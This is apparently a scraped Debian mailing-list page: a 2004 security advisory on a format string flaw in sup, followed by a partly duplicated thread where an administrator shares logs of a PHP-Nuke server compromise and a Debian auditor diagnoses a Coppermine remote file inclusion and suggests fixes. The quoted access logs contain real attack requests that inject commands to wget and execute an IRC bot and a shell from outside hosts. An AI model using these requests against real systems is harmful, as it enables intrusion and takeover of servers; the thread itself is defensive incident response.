Ticket creation failed
No permission to create tickets in the queue 'accounts' -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 521-1 [EMAIL PROTECTED] http://www.debian.org/security/ Matt Zimmerman June 18th, 2004 http://www.debian.org/security/faq - -- Package: sup Vulnerability : format string Problem-Type : remote Debian-specific: no CVE Ids: CAN-2004-0451 [EMAIL PROTECTED] discovered a format string vulnerability in sup, a set of programs to synchronize collections of files across a number of machines, whereby a remote attacker could potentially cause arbitrary code to be executed with the privileges of the supfilesrv process (this process does not run automatically by default). CAN-2004-0451: format string vulnerabilities in sup via syslog(3) in logquit, logerr, loginfo functions For the current stable distribution (woody), this problem has been fixed in version 1.8-8woody2. For the unstable distribution (sid), this problem will be fixed soon. We recommend that you update your sup package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2.dsc Size/MD5 checksum: 538 f5817f83647a677ec6781c9d55843307 http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2.diff.gz Size/MD5 checksum: 6859 7b9cf999b1fb2c7662024ceb0c498039 http://security.debian.org/pool/updates/main/s/sup/sup_1.8.orig.tar.gz Size/MD5 checksum: 65 76371f01340ce62cd71687349c5aa27e Alpha architecture: http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_alpha.deb Size/MD5 checksum: 103714 62123f3b8178825af23107d24c843bd1 ARM architecture: http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_arm.deb Size/MD5 checksum:82756 a866d4f3b3fdbdb86e2db7ba745ea480 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_i386.deb Size/MD5 checksum:82624 580ca0b977cc27212c4e7778b435d4f3 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_ia64.deb Size/MD5 checksum: 127664 cf7db9e24bbf333da16343bcdc5e9e82 HP Precision architecture: http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_hppa.deb Size/MD5 checksum:94516 371292e2eaec3f04d49c8b29cb6e82ed Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_m68k.deb Size/MD5 checksum:76454 4144ec09078326ba8e3facc6bef0e3b8 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_mips.deb Size/MD5 checksum:96814 c7e843b2ac5573c792c8c45910717f07 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_mipsel.deb Size/MD5 checksum:96452 c0558b55bce77470e1d9d52b515d39e1 PowerPC architecture: http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_powerpc.deb Size/MD5 checksum:85246 06e0683ba5c24a406a02b131304a6e6f IBM S/390 architecture: http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_s390.deb Size/MD5 checksum:84656 b1e6f251fc3a22eb43d9bbd3044828bc Sun Sparc architecture: http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_sparc.deb Size/MD5 checksum:89948 b8965ae16901df1eb9eb64faa8169d39 These files will probably be moved into the stable distribution on its next revision. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: [EMAIL PROTECTED] Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFA07eRArxCt0PiXR4RArlSAJ4iW4GblVHLWXwzearT+H4mGQcg/gCgiViY A2Pf/3Y9xupsEwnFSH+Cr5w= =yjyQ -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Advice needed, trying to find the vulnerable code on Debian webserver.
On Sat, Jun 19, 2004 at 10:42:56AM +1000, Ross Tsolakidis wrote: > Hi all, > > I did a search in the logs on some of the suspicious users and found a > match. > The files that are being downloaded then executed see to be IRC bots. > http://www.energymech.net/ > > Here are some log files. > > 193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET > /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe > la.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz > vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200 > 6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" > > All those executables in the /tmp dir seem to be all coming from that > site on our box, definitely the culprit. > > Can someone explain what is going on here ? > Cause it doesn't make any sense. There seems to be some buggy PHP code being used on that site, which is allowing the remote inclusion of content from the mirabella.net site - this is being abused to run code upon your host. You should immediately disable the coppermine PHPNuke module and get it patched, upgraded, or replaced. Going to securityfocus.com and searching the mailing lists for coppermine pulls up multiple hits describing problems - for example this post: http://www.securityfocus.com/archive/1/361976 Notice the URLs on section E2? They match yours.. See this one for more details too: http://www.securityfocus.com/archive/1/361976 Two things you can do immediately to stop this particular exploit are run safe mode for PHP, and firewall off access to mirabella.net. > What steps should I take now ? Remove PHP Nuke, check the logs for other activity, make sure your kernel is patched against local root via the recent wholes, and look at using a locked down PHP installation - I'm not sure how PHPNuke will work with that, but it's gotta be worth a try. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit
RE: Advice needed, trying to find the vulnerable code on Debian webserver.
Hi all, I did a search in the logs on some of the suspicious users and found a match. The files that are being downloaded then executed see to be IRC bots. http://www.energymech.net/ Here are some log files. 193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe la.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200 6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 193.95.112.71 - - [18/Jun/2004:22:57:05 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe la.net/a.txt?&cmd=cd%20/tmp/;ps%20x HTTP/1.0" 200 8847 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 200.177.162.14 - - [21/May/2004:19:10:06 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.brooks equipment.com/newcmd.gif?&cmd=cd%20/tmp;%20wget%20200.177.162.14/bshell HTTP/1.1" 200 11813 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" 193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe la.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200 6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe la.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200 6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" All those executables in the /tmp dir seem to be all coming from that site on our box, definitely the culprit. Can someone explain what is going on here ? Cause it doesn't make any sense. The site in question is a phpnuke site with lots of modules. What steps should I take now ? Thanks very much for everyones help. -- Ross -Original Message- From: Ross Tsolakidis Sent: Friday, 18 June 2004 9:20 AM To: debian-security@lists.debian.org Subject: RE: Advice needed, trying to find the vulnerable code on Debian webserver. Thanks to everyone who has responded. I will be investigating all these options in the next few days, I'll keep you all informed. -- Ross -Original Message- From: Steve Kemp [mailto:[EMAIL PROTECTED] On Behalf Of Steve Kemp Sent: Thursday, 17 June 2004 3:24 AM To: [EMAIL PROTECTED] Cc: Alvin Oga; debian-security@lists.debian.org Subject: Re: Advice needed, trying to find the vulnerable code on Debian webserver. On Wed, Jun 16, 2004 at 11:44:17AM -0500, Micah Anderson wrote: > > > > > > Install some rules for it to harden your webserver, see if > > > anything is flagged in the security log. > > > > other web server testing tools > > http://www.linux-sec.net/Web/#Testing > > Has anyone actually used any of these to find the vulnerabilities that > are being discussed? Not personally, I've used snort and some other custom logging code to find exploit attempts in real time though. Can you tell us what CGI apps are installed upon the box? Or do the access logs should anything suspicious? It's clear that Apache is the route into the system if you have files owned by www-data - maybe mounting /tmp noexec would help? (note: mounting /tmp noexec breaks apt often). Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] DISCLAIMER: This e-mail and any files transmitted with it may be privileged and confidential, and are intended only for the use of the intended recipient. If you are not the intended recipient or responsible for delivering this e-mail to the intended recipient, any use, dissemination, forwarding, printing or copying of this e-mail and any attachments is strictly prohibited. If you have received this e-mail in error, please REPLY TO the SENDER to advise the error AND then DELETE the e-mail from your system. Any views expressed in this e-mail and any files transmitted with it are those of the individual sender, except where the sender specifically states them to be the views of our organisation. Our organisation does not represent or warrant that the attached files are free from computer viruses or other defects. The user assumes all responsibility for any loss or damage resulting directly or indirectly from the use of the attached files. In any event, the liability to our organisation is limited to either the resupply of the attached files or the cost of having the attached files resupplied.
Re: Advice needed, trying to find the vulnerable code on Debian webserver.
On Sat, Jun 19, 2004 at 10:42:56AM +1000, Ross Tsolakidis wrote: > Hi all, > > I did a search in the logs on some of the suspicious users and found a > match. > The files that are being downloaded then executed see to be IRC bots. > http://www.energymech.net/ > > Here are some log files. > > 193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET > /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe > la.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz > vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200 > 6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" > > All those executables in the /tmp dir seem to be all coming from that > site on our box, definitely the culprit. > > Can someone explain what is going on here ? > Cause it doesn't make any sense. There seems to be some buggy PHP code being used on that site, which is allowing the remote inclusion of content from the mirabella.net site - this is being abused to run code upon your host. You should immediately disable the coppermine PHPNuke module and get it patched, upgraded, or replaced. Going to securityfocus.com and searching the mailing lists for coppermine pulls up multiple hits describing problems - for example this post: http://www.securityfocus.com/archive/1/361976 Notice the URLs on section E2? They match yours.. See this one for more details too: http://www.securityfocus.com/archive/1/361976 Two things you can do immediately to stop this particular exploit are run safe mode for PHP, and firewall off access to mirabella.net. > What steps should I take now ? Remove PHP Nuke, check the logs for other activity, make sure your kernel is patched against local root via the recent wholes, and look at using a locked down PHP installation - I'm not sure how PHPNuke will work with that, but it's gotta be worth a try. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
RE: Advice needed, trying to find the vulnerable code on Debian webserver.
Hi all, I did a search in the logs on some of the suspicious users and found a match. The files that are being downloaded then executed see to be IRC bots. http://www.energymech.net/ Here are some log files. 193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe la.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200 6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 193.95.112.71 - - [18/Jun/2004:22:57:05 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe la.net/a.txt?&cmd=cd%20/tmp/;ps%20x HTTP/1.0" 200 8847 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 200.177.162.14 - - [21/May/2004:19:10:06 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.brooks equipment.com/newcmd.gif?&cmd=cd%20/tmp;%20wget%20200.177.162.14/bshell HTTP/1.1" 200 11813 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" 193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe la.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200 6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe la.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200 6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" All those executables in the /tmp dir seem to be all coming from that site on our box, definitely the culprit. Can someone explain what is going on here ? Cause it doesn't make any sense. The site in question is a phpnuke site with lots of modules. What steps should I take now ? Thanks very much for everyones help. -- Ross -Original Message- From: Ross Tsolakidis Sent: Friday, 18 June 2004 9:20 AM To: [EMAIL PROTECTED] Subject: RE: Advice needed, trying to find the vulnerable code on Debian webserver. Thanks to everyone who has responded. I will be investigating all these options in the next few days, I'll keep you all informed. -- Ross -Original Message- From: Steve Kemp [mailto:[EMAIL PROTECTED] On Behalf Of Steve Kemp Sent: Thursday, 17 June 2004 3:24 AM To: [EMAIL PROTECTED] Cc: Alvin Oga; [EMAIL PROTECTED] Subject: Re: Advice needed, trying to find the vulnerable code on Debian webserver. On Wed, Jun 16, 2004 at 11:44:17AM -0500, Micah Anderson wrote: > > > > > > Install some rules for it to harden your webserver, see if > > > anything is flagged in the security log. > > > > other web server testing tools > > http://www.linux-sec.net/Web/#Testing > > Has anyone actually used any of these to find the vulnerabilities that > are being discussed? Not personally, I've used snort and some other custom logging code to find exploit attempts in real time though. Can you tell us what CGI apps are installed upon the box? Or do the access logs should anything suspicious? It's clear that Apache is the route into the system if you have files owned by www-data - maybe mounting /tmp noexec would help? (note: mounting /tmp noexec breaks apt often). Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] DISCLAIMER: This e-mail and any files transmitted with it may be privileged and confidential, and are intended only for the use of the intended recipient. If you are not the intended recipient or responsible for delivering this e-mail to the intended recipient, any use, dissemination, forwarding, printing or copying of this e-mail and any attachments is strictly prohibited. If you have received this e-mail in error, please REPLY TO the SENDER to advise the error AND then DELETE the e-mail from your system. Any views expressed in this e-mail and any files transmitted with it are those of the individual sender, except where the sender specifically states them to be the views of our organisation. Our organisation does not represent or warrant that the attached files are free from computer viruses or other defects. The user assumes all responsibility for any loss or damage resulting directly or indirectly from the use of the attached files. In any event, the liability to our organisation is limited to either the resupply of the attached files or the cost of having the attached files resupplied.